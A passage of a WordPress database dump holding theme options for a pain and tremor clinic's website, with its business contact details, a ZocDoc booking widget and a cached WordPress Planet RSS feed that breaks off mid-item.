Sunday.\";s:2:\"id\";s:17:\"nice_sunday_hours\";s:3:\"std\";s:1:\"0\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:15:\"select_multiple\";s:7:\"options\";a:49:{i:0;s:6:\"Closed\";s:5:\"01:00\";s:5:\"01:00\";s:5:\"01:30\";s:5:\"01:30\";s:5:\"02:00\";s:5:\"02:00\";s:5:\"02:30\";s:5:\"02:30\";s:5:\"03:00\";s:5:\"03:00\";s:5:\"03:30\";s:5:\"03:30\";s:5:\"04:00\";s:5:\"04:00\";s:5:\"04:30\";s:5:\"04:30\";s:5:\"05:00\";s:5:\"05:00\";s:5:\"05:30\";s:5:\"05:30\";s:5:\"06:00\";s:5:\"06:00\";s:5:\"06:30\";s:5:\"06:30\";s:5:\"07:00\";s:5:\"07:00\";s:5:\"07:30\";s:5:\"07:30\";s:5:\"08:00\";s:5:\"08:00\";s:5:\"08:30\";s:5:\"08:30\";s:5:\"09:00\";s:5:\"09:00\";s:5:\"09:30\";s:5:\"09:30\";s:5:\"10:00\";s:5:\"10:00\";s:5:\"10:30\";s:5:\"10:30\";s:5:\"11:00\";s:5:\"11:00\";s:5:\"11:30\";s:5:\"11:30\";s:5:\"12:00\";s:5:\"12:00\";s:5:\"12:30\";s:5:\"12:30\";s:5:\"13:00\";s:5:\"13:00\";s:5:\"13:30\";s:5:\"13:30\";s:5:\"14:00\";s:5:\"14:00\";s:5:\"14:30\";s:5:\"14:30\";s:5:\"15:00\";s:5:\"15:00\";s:5:\"15:30\";s:5:\"15:30\";s:5:\"16:00\";s:5:\"16:00\";s:5:\"16:30\";s:5:\"16:30\";s:5:\"17:00\";s:5:\"17:00\";s:5:\"17:30\";s:5:\"17:30\";s:5:\"18:00\";s:5:\"18:00\";s:5:\"18:30\";s:5:\"18:30\";s:5:\"19:00\";s:5:\"19:00\";s:5:\"19:30\";s:5:\"19:30\";s:5:\"20:00\";s:5:\"20:00\";s:5:\"20:30\";s:5:\"20:30\";s:5:\"21:00\";s:5:\"21:00\";s:5:\"21:30\";s:5:\"21:30\";s:5:\"22:00\";s:5:\"22:00\";s:5:\"22:30\";s:5:\"22:30\";s:5:\"23:00\";s:5:\"23:00\";s:5:\"23:30\";s:5:\"23:30\";s:5:\"24:00\";s:5:\"24:00\";s:5:\"24:30\";s:5:\"24:30\";}}i:81;a:2:{s:4:\"name\";s:6:\"Images\";s:4:\"type\";s:7:\"heading\";}i:82;a:6:{s:4:\"name\";s:18:\"WP Resize Cropping\";s:4:\"desc\";s:68:\"The post thumbnail will be cropped to match the target aspect ratio.\";s:2:\"id\";s:19:\"nice_wp_resize_crop\";s:3:\"std\";s:4:\"true\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";}i:83;a:5:{s:4:\"name\";s:12:\"JPEG Quality\";s:4:\"desc\";s:83:\"Change the JPEG compression-level of uploaded images and thumbnails.(Default is 90)\";s:2:\"id\";s:17:\"nice_jpeg_quality\";s:3:\"std\";a:5:{s:5:\"range\";s:3:\"min\";s:5:\"value\";s:2:\"90\";s:3:\"min\";s:2:\"40\";s:3:\"max\";s:3:\"100\";s:4:\"unit\";s:1:\"%\";}s:4:\"type\";s:6:\"slider\";}i:84;a:2:{s:4:\"name\";s:12:\"Social Media\";s:4:\"type\";s:7:\"heading\";}i:85;a:6:{s:4:\"name\";s:12:\"Facebook URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:17:\"nice_facebook_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:86;a:6:{s:4:\"name\";s:11:\"Twitter URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:16:\"nice_twitter_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:87;a:6:{s:4:\"name\";s:11:\"Google+ URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:15:\"nice_google_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:88;a:6:{s:4:\"name\";s:13:\"Instagram URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:18:\"nice_instagram_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:89;a:6:{s:4:\"name\";s:12:\"Dribbble URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:17:\"nice_dribbble_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:90;a:6:{s:4:\"name\";s:9:\"Vimeo URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:14:\"nice_vimeo_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:91;a:6:{s:4:\"name\";s:10:\"Forrst URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:15:\"nice_forrst_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:92;a:6:{s:4:\"name\";s:10:\"Tumblr URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:15:\"nice_tumblr_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:93;a:6:{s:4:\"name\";s:10:\"Flickr URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:15:\"nice_flickr_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:94;a:6:{s:4:\"name\";s:11:\"Youtube URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:16:\"nice_youtube_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:95;a:6:{s:4:\"name\";s:12:\"Linkedin URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:17:\"nice_linkedin_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:96;a:6:{s:4:\"name\";s:9:\"500px URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:22:\"nice_fivehundredpx_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:97;a:6:{s:4:\"name\";s:11:\"Behance URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:16:\"nice_behance_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:98;a:6:{s:4:\"name\";s:13:\"Devianart URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:18:\"nice_devianart_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:99;a:6:{s:4:\"name\";s:10:\"Envato URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:15:\"nice_envato_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:100;a:6:{s:4:\"name\";s:14:\"Foursquare URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:19:\"nice_foursquare_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:101;a:6:{s:4:\"name\";s:8:\"Path URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:13:\"nice_path_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:102;a:6:{s:4:\"name\";s:13:\"Pinterest URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:18:\"nice_pinterest_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:103;a:6:{s:4:\"name\";s:9:\"Quora URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:14:\"nice_quora_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:104;a:6:{s:4:\"name\";s:9:\"Skype URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:14:\"nice_skype_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:105;a:6:{s:4:\"name\";s:13:\"WordPress URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:18:\"nice_wordpress_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:106;a:6:{s:4:\"name\";s:11:\"Android URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:16:\"nice_android_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:107;a:6:{s:4:\"name\";s:9:\"Apple URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:14:\"nice_apple_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:108;a:6:{s:4:\"name\";s:13:\"Designmoo URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:18:\"nice_designmoo_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:109;a:6:{s:4:\"name\";s:10:\"Github URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:15:\"nice_github_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:110;a:6:{s:4:\"name\";s:10:\"Paypal URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:15:\"nice_paypal_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:111;a:6:{s:4:\"name\";s:15:\"Squarespace URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:20:\"nice_squarespace_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:112;a:6:{s:4:\"name\";s:10:\"Zerply URL\";s:4:\"desc\";s:0:\"\";s:2:\"id\";s:15:\"nice_zerply_url\";s:3:\"std\";s:0:\"\";s:3:\"tip\";s:0:\"\";s:4:\"type\";s:4:\"text\";}}','yes'),(154,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(158,'nice_favicon','','yes'),(159,'nice_sidebar_position','right','yes'),(160,'nice_post_author','true','yes'),(161,'nice_back_to_top','true','yes'),(162,'nice_call_now_text','Call Now','yes'),(163,'nice_tracking_code','','yes'),(164,'nice_accent_color','#3e7ec2','yes'),(165,'nice_secondary_color','#4b6b31','yes'),(166,'nice_custom_css','','yes'),(167,'nice_logo','http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/logo.png','yes'),(168,'nice_logo_retina','','yes'),(169,'nice_logo_height','70','yes'),(170,'nice_header_background_color','#528bcb','yes'),(171,'nice_header_background_image','','yes'),(172,'nice_header_background_image_repeat','repeat','yes'),(173,'nice_header_background_image_position','left top','yes'),(174,'nice_texttitle','false','yes'),(175,'nice_font_site_title','a:4:{s:4:\"size\";s:2:\"30\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:4:\"#fff\";}','yes'),(176,'nice_custom_copyright_enable','true','yes'),(177,'nice_custom_copyright_text','NEUROCENTER FOR PAIN AND TREMOR INC. © 2014','yes'),(178,'nice_footer_columns','3','yes'),(179,'nice_custom_typography','false','yes'),(180,'nice_font_body','a:4:{s:4:\"size\";s:2:\"13\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#757B83\";}','yes'),(181,'nice_font_nav','a:4:{s:4:\"size\";s:2:\"13\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#ffffff\";}','yes'),(182,'nice_font_post_title','a:4:{s:4:\"size\";s:2:\"30\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#43484D\";}','yes'),(183,'nice_font_post_meta','a:4:{s:4:\"size\";s:2:\"13\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#BBBBBB\";}','yes'),(184,'nice_font_post_entry','a:4:{s:4:\"size\";s:2:\"14\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#757B83\";}','yes'),(185,'nice_font_welcome_message','a:4:{s:4:\"size\";s:2:\"38\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#43484D\";}','yes'),(186,'nice_font_welcome_message_extended','a:4:{s:4:\"size\";s:2:\"14\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#757B83\";}','yes'),(187,'nice_font_slider_title','a:4:{s:4:\"size\";s:2:\"38\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#FFFFFF\";}','yes'),(188,'nice_font_slider_content','a:4:{s:4:\"size\";s:2:\"17\";s:6:\"family\";s:7:\"Raleway\";s:5:\"style\";s:6:\"normal\";s:5:\"color\";s:7:\"#FFFFFF\";}','yes'),(189,'nice_social_enable','true','yes'),(190,'nice_welcome_message','','yes'),(191,'nice_welcome_message_extended','','yes'),(192,'nice_staff_enable','true','yes'),(193,'nice_staff_title','Our Professionals','yes'),(194,'nice_staff_order','date','yes'),(195,'nice_staff_button_text','Meet Our Professionals','yes'),(196,'nice_staff_button_url','http://theworstpain.com/Neuro/our-staff','yes'),(197,'nice_service_enable','true','yes'),(198,'nice_service_title','Our Services','yes'),(199,'nice_service_order','date','yes'),(200,'nice_testimonial_enable','true','yes'),(201,'nice_testimonial_title','What our patients are saying','yes'),(202,'nice_testimonial_order','date','yes'),(203,'nice_testimonial_button_text','Read more testimonials','yes'),(204,'nice_testimonial_button_url','http://theworstpain.com/Neuro/feedback','yes'),(205,'nice_slider','true','yes'),(206,'nice_slider_entries','3','yes'),(207,'nice_slider_animation','fade','yes'),(208,'nice_slider_reverse','false','yes'),(209,'nice_slider_pause_on_hover','false','yes'),(210,'nice_slider_randomize','false','yes'),(211,'nice_slider_animation_loop','false','yes'),(212,'nice_slider_animation_speed','600','yes'),(213,'nice_slider_slideshow','false','yes'),(214,'nice_slider_slideshow_speed','7000','yes'),(215,'nice_slider_control_nav','false','yes'),(216,'nice_slider_direction_nav','true','yes'),(217,'nice_slider_caption','true','yes'),(218,'nice_email','chodakiewitzstaff@yahoo.com','yes'),(219,'nice_address','Locations\r\n\r\nMain location and mailing address\r\n1125 S Beverly Drive, Suite 610\r\nLos Angeles, CA 90035-1182\r\n\r\n9555 Foothill Boulevard\r\nRancho Cucamonga, CA 91730-3575\r\n\r\nM-F 9:00 am - 5:00 pm','yes'),(220,'nice_google_map','','yes'),(221,'nice_phone_number','(310) 553-3379 </br> <div> <a style=\'display:block;\' href=\'http://www.zocdoc.com/practice/neurocenter-for-pain-and-tremor-37021?lock=true&isNewPatient=false&referrerType=Widget\'> <img src=\'http://offsiteSchedule.zocdoc.com/images/remote/book-orange.png\' border=\'0\' /> </a> <a style=\'display:block; position: relative; left: 126px;\' href=\'http://www.zocdoc.com\' title=\'Powered by ZocDoc Doctor Directory\'> <img src=\'http://offsiteSchedule.zocdoc.com/images/remote/powered-by-light.png\' height=\'15px\' width=\'92px\' alt=\'Powered by ZocDoc Doctor Directory\' /> </a> </div>','yes'),(222,'nice_hours_format','h:i A','yes'),(223,'nice_monday_hours','a:1:{i:0;s:1:\"0\";}','yes'),(224,'nice_tuesday_hours','a:1:{i:0;s:1:\"0\";}','yes'),(225,'nice_wednesday_hours','a:1:{i:0;s:1:\"0\";}','yes'),(226,'nice_thursday_hours','a:1:{i:0;s:1:\"0\";}','yes'),(227,'nice_friday_hours','a:1:{i:0;s:1:\"0\";}','yes'),(228,'nice_saturday_hours','a:1:{i:0;s:1:\"0\";}','yes'),(229,'nice_sunday_hours','a:1:{i:0;s:1:\"0\";}','yes'),(230,'nice_wp_resize_crop','true','yes'),(231,'nice_jpeg_quality','90','yes'),(232,'nice_facebook_url','','yes'),(233,'nice_twitter_url','','yes'),(234,'nice_google_url','','yes'),(235,'nice_instagram_url','','yes'),(236,'nice_dribbble_url','','yes'),(237,'nice_vimeo_url','','yes'),(238,'nice_forrst_url','','yes'),(239,'nice_tumblr_url','','yes'),(240,'nice_flickr_url','','yes'),(241,'nice_youtube_url','','yes'),(242,'nice_linkedin_url','','yes'),(243,'nice_fivehundredpx_url','','yes'),(244,'nice_behance_url','','yes'),(245,'nice_devianart_url','','yes'),(246,'nice_envato_url','','yes'),(247,'nice_foursquare_url','','yes'),(248,'nice_path_url','','yes'),(249,'nice_pinterest_url','','yes'),(250,'nice_quora_url','','yes'),(251,'nice_skype_url','','yes'),(252,'nice_wordpress_url','','yes'),(253,'nice_android_url','','yes'),(254,'nice_apple_url','','yes'),(255,'nice_designmoo_url','','yes'),(256,'nice_github_url','','yes'),(257,'nice_paypal_url','','yes'),(258,'nice_squarespace_url','','yes'),(259,'nice_zerply_url','','yes'),(356,'category_children','a:0:{}','yes'),(11901,'db_upgraded','','yes'),(21485,'_site_transient_timeout_browser_ffc03cf4cff9e192501dee13654f43a8','1455676547','yes'),(21486,'_site_transient_browser_ffc03cf4cff9e192501dee13654f43a8','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"48.0.2564.97\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(26505,'_site_transient_timeout_browser_7c7be51268629463f235afd39148becf','1469987998','yes'),(26506,'_site_transient_browser_7c7be51268629463f235afd39148becf','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"51.0.2704.103\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(21448,'_site_transient_timeout_browser_65feb24aef1cc1051ced887bffb2f3db','1455676205','yes'),(21449,'_site_transient_browser_65feb24aef1cc1051ced887bffb2f3db','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"48.0.2564.97\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(21450,'can_compress_scripts','1','yes'),(26511,'_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1469383202','no'),(26509,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1469426402','no'),(26510,'_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1469426402','no'),(26512,'_transient_timeout_feed_867bd5c64f85878d03a060509cd2f92c','1469426402','no'),(26513,'_transient_feed_867bd5c64f85878d03a060509cd2f92c','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:46:\"WP Mobile Apps: WordPress for iOS: Version 6.3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://apps.wordpress.com/?p=3471\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://apps.wordpress.com/2016/07/16/wordpress-for-ios-version-6-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2227:\"<p>Hi there, WordPress users! <a href=\"https://itunes.apple.com/us/app/wordpress/id335703880?mt=8&uo=6&at=&ct=\">Version 6.3 of the WordPress for iOS app</a> is now available in the App Store.</p>\n<h1>What’s New:</h1>\n<p><strong>Access your site’s media library</strong> — even if WordPress isn’t given permission to access your personal photo library.</p>\n\n<a href=\"https://apps.wordpress.com/img_2282/\"><img width=\"169\" height=\"300\" src=\"https://apps.files.wordpress.com/2016/06/img_2282.png?w=169&h=300\" class=\"attachment-medium size-medium\" alt=\"IMG_2282\" /></a>\n\n<p><strong>An improved design</strong> makes updating your WordPress.com profile and account settings easier and faster than ever.</p>\n<p><strong>Several UI fixes.</strong> A bevy of fixes for WordPress for iPad, including search field, date picker, and layout improvements.</p>\n<p><strong>And much more! </strong>You can see the full list of changes <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?utf8=✓&q=is%3Aissue%20is%3Aclosed%20milestone%3A6.3\">here</a>.</p>\n<h1>Thank You</h1>\n<p>Thanks to all of the contributors who worked on this release:<br />\n<a href=\"https://github.com/aerych\">@aerych</a>, <a href=\"https://github.com/astralbodies\">@astralbodies</a>, <a href=\"https://github.com/claudiosmweb\">@claudiosmweb</a>, <a href=\"https://github.com/diegoreymendez\">@diegoreymendez</a>, <a href=\"https://github.com/frosty\">@frosty</a>, <a href=\"https://github.com/jleandroperez\">@jleandroperez</a>, <a href=\"https://github.com/koke\">@koke</a>, <a href=\"https://github.com/kurzee\">@kurzee</a>, <a href=\"https://github.com/kwonye\">@kwonye</a>, <a href=\"https://github.com/oguzkocer\">@oguzkocer</a>, <a href=\"https://github.com/sendhil\">@sendhil</a>, <a href=\"https://github.com/SergioEstevao\">@SergioEstevao</a>.</p>\n<p>You can track the development progress for the next update by visiting <a href=\"https://github.com/wordpress-mobile/WordPress-iOS/issues?utf8=✓&q=is%3Aissue+milestone%3A6.4+\" target=\"_blank\">our 6.4 milestone on GitHub</a>. Until next time!</p><img alt=\"\" border=\"0\" src=\"https://pixel.wp.com/b.gif?host=apps.wordpress.com&blog=108068616&post=3471&subd=apps&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 16 Jul 2016 21:12:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"diegoreymendez\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WordPress.tv Blog: Staff Pick: Theming in WordPress – Where do I start?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.wordpress.tv/?p=524\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"http://blog.wordpress.tv/2016/07/16/staff-pick-theming-in-wordpress-where-do-i-start/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1125:\"<p>From the stage of <a href=\"http://wordpress.tv/event/wordcamp-europe-2016/\">WordCamp Europe 2016</a> here is Edmund Turbin’s great presentation on how to get started in creating WordPress themes.</p>\n<p></p>\n<p>Base theme, child theme, framework – These are a few of the options you can use for creating a WordPress Theme. Wether you are developing a theme for your personal blog, a clients website, or a theme to be used by other sites and the WordPress community, it is important to know the different approaches for getting started with theme development.</p>\n<p><a href=\"http://www.slideshare.net/eturbin/theming-wordpress-where-do-i-start\">Presentation Slides</a></p>\n<p><a href=\"http://wordpress.tv/\">Watch more great videos on WordPress.tv!</a></p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptvblog.wordpress.com/524/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptvblog.wordpress.com/524/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.wordpress.tv&blog=5310177&post=524&subd=wptvblog&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 16 Jul 2016 02:49:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Jerry Bates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Post Status: Medium and WordPress — Draft 